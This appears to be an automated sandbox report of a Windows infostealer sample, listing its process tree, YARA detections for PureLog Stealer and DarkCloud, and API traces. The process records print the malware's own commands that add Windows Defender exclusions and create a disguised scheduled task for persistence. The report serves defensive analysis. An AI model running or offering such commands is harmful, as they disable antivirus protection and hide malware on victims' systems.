                                                                                      2024-11-27 19:48:23 UTC 388 IN HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 27 Nov 2024 19:48:23 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 552
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection



                                                                                      Target ID:0
                                                                                      Start time:14:46:13
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe"
                                                                                      Imagebase:0x870000
                                                                                      File size:982'528 bytes
                                                                                      MD5 hash:4112AC3213933BFC8412B5312D17377F
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2267554201.0000000005600000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.2265406879.000000000485B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.2265406879.000000000485B000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                      • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:3
                                                                                      Start time:14:46:16
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe"
                                                                                      Imagebase:0x240000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:4
                                                                                      Start time:14:46:16
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:6
                                                                                      Start time:14:46:19
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XgbXowhljC.exe"
                                                                                      Imagebase:0x240000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:7
                                                                                      Start time:14:46:19
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:8
                                                                                      Start time:14:46:22
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp"
                                                                                      Imagebase:0x490000
                                                                                      File size:187'904 bytes
                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:9
                                                                                      Start time:14:46:22
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:10
                                                                                      Start time:14:46:23
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe"
                                                                                      Imagebase:0x840000
                                                                                      File size:982'528 bytes
                                                                                      MD5 hash:4112AC3213933BFC8412B5312D17377F
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Target ID:11
                                                                                      Start time:14:46:24
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      Imagebase:0x8e0000
                                                                                      File size:982'528 bytes
                                                                                      MD5 hash:4112AC3213933BFC8412B5312D17377F
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 66%, ReversingLabs
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:12
                                                                                      Start time:14:46:25
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpFCC3.tmp"
                                                                                      Imagebase:0x490000
                                                                                      File size:187'904 bytes
                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:13
                                                                                      Start time:14:46:25
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:14
                                                                                      Start time:14:46:25
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\XgbXowhljC.exe"
                                                                                      Imagebase:0xb20000
                                                                                      File size:982'528 bytes
                                                                                      MD5 hash:4112AC3213933BFC8412B5312D17377F
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Target ID:15
                                                                                      Start time:14:46:28
                                                                                      Start date:27/11/2024
                                                                                      Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                                                      Imagebase:0xc10000
                                                                                      File size:418'304 bytes
                                                                                      MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true


                                                                                        Execution Graph

                                                                                        Execution Coverage:10.4%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:9.5%
                                                                                        Total number of Nodes:243
                                                                                        Total number of Limit Nodes:27

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7260000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: ActiveCaptureWindow
                                                                                        • String ID: Haq$Haq
                                                                                        • API String ID: 2424615356-4016896955

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7260000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: ActiveCaptureWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2424615356-0

                                                                                        Control-flow Graph

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: DispatchMessage
                                                                                        • String ID:
                                                                                        • API String ID: 2061451462-0

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7260000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID: 0-3916222277
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2270241707.000000000BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_bf90000_oS6KsQIqJxe038Y.jbxd
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2270241707.000000000BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_bf90000_oS6KsQIqJxe038Y.jbxd
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2263408209.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1330000_oS6KsQIqJxe038Y.jbxd
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2263408209.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1330000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 72d1448a380b238908911149d9b011db07641b030b0b4fa3dc8349d9e2e63779
                                                                                        • Instruction ID: e7a26314374d8806f0ecf2e571354c8b2c2e82bf0214307eb2b554ea61129e3f
                                                                                        • Opcode Fuzzy Hash: 72d1448a380b238908911149d9b011db07641b030b0b4fa3dc8349d9e2e63779
                                                                                        • Instruction Fuzzy Hash: 4751D570E002099FDB09DFA9D855AEEFBF2BF88304F148429D419AB368DB355846CF94
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2263408209.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1330000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1f9b22624b6b24ea36e72715c4cb2e9508590320b3368e0be50beb4cfe397ac7
                                                                                        • Instruction ID: 45831ee699d57e3c5968eb746d5c388a1ee1f2bbd85804f788ecb70afc3798d6
                                                                                        • Opcode Fuzzy Hash: 1f9b22624b6b24ea36e72715c4cb2e9508590320b3368e0be50beb4cfe397ac7
                                                                                        • Instruction Fuzzy Hash: 1A51B574E002099FDB08DFA9D895AEEFBF2FF88304F148429D419AB368DB355846CB54

Control-flow Graph (rendered graph not preserved)
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0133D4DE
                                                                                        • GetCurrentThread.KERNEL32 ref: 0133D51B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0133D558
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0133D5B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2263408209.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Control-flow Graph (rendered graph not preserved)
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0133D4DE
                                                                                        • GetCurrentThread.KERNEL32 ref: 0133D51B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0133D558
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0133D5B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2263408209.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Control-flow Graph (rendered graph not preserved; nodes reference GetFocus and KiUserCallbackDispatcher)
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false

Control-flow Graph (rendered graph not preserved)
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 013359C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2263408209.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Control-flow Graph (rendered graph not preserved)
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 013359C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2263408209.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                        APIs
                                                                                        • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0B6119C7), ref: 0B61253D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        • API ID: Focus
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 07266052
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0BF92145
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2270241707.000000000BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF90000, based on PE: false
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 0726CB25
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        APIs
                                                                                        • EnumThreadWindows.USER32(?,00000000,?), ref: 07266131
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0133D72F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2263408209.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0133D72F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2263408209.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1330000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        APIs
                                                                                        • EnumThreadWindows.USER32(?,00000000,?), ref: 07266131
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7260000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumThreadWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2941952884-0
                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0BF92145
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2270241707.000000000BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_bf90000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallbackDispatcherUser
                                                                                        • String ID:
                                                                                        • API String ID: 2492992576-0
                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,0B61190F,00000000,03D14128,02D308CC,00000000,?), ref: 0B61206D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallbackDispatcherUser
                                                                                        • String ID:
                                                                                        • API String ID: 2492992576-0
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0B611882,00000000,00000000,03D14128,02D308CC), ref: 0B611CD0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePeek
                                                                                        • String ID:
                                                                                        • API String ID: 2222842502-0
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0B611882,00000000,00000000,03D14128,02D308CC), ref: 0B611CD0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePeek
                                                                                        • String ID:
                                                                                        • API String ID: 2222842502-0
                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,0B61190F,00000000,03D14128,02D308CC,00000000,?), ref: 0B61206D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallbackDispatcherUser
                                                                                        • String ID:
                                                                                        • API String ID: 2492992576-0
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?,?,?,?,?,07267999,?,?,00000000), ref: 07267A0D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7260000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0133B41E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2263408209.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1330000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 0726CB25
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7260000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?,?,?,?,?,07267999,?,?,00000000), ref: 07267A0D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7260000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0133B41E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2263408209.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1330000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        APIs
                                                                                        • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0B6119C7), ref: 0B61253D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: DispatchMessage
                                                                                        • String ID:
                                                                                        • API String ID: 2061451462-0
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?,?,?,?,?,07267999,?,?,00000000), ref: 07267A0D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7260000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        APIs
                                                                                        • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0B6119C7), ref: 0B61253D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: DispatchMessage
                                                                                        • String ID:
                                                                                        • API String ID: 2061451462-0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2262873894.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_114d000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2262873894.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_114d000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2262980129.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_115d000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 27f72bfbd0b5cf4391c28279ce4731cad88309798fb5b99c83a338ccebfd2416
                                                                                        • Instruction ID: 7db71738001e5673879f85f8cb67c5dba83962cb8ca42f191d7b3b6c7dc19890
                                                                                        • Opcode Fuzzy Hash: 27f72bfbd0b5cf4391c28279ce4731cad88309798fb5b99c83a338ccebfd2416
                                                                                        • Instruction Fuzzy Hash: E821F271504204EFDF49DFA8E9C0B26BBA5FB88324F20C56DED194B256C37AD446CB62
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2262980129.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_115d000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c7dd174426a4f66edf3a7771daf9b85ef99f06db188ae05cfb473cd416e7e962
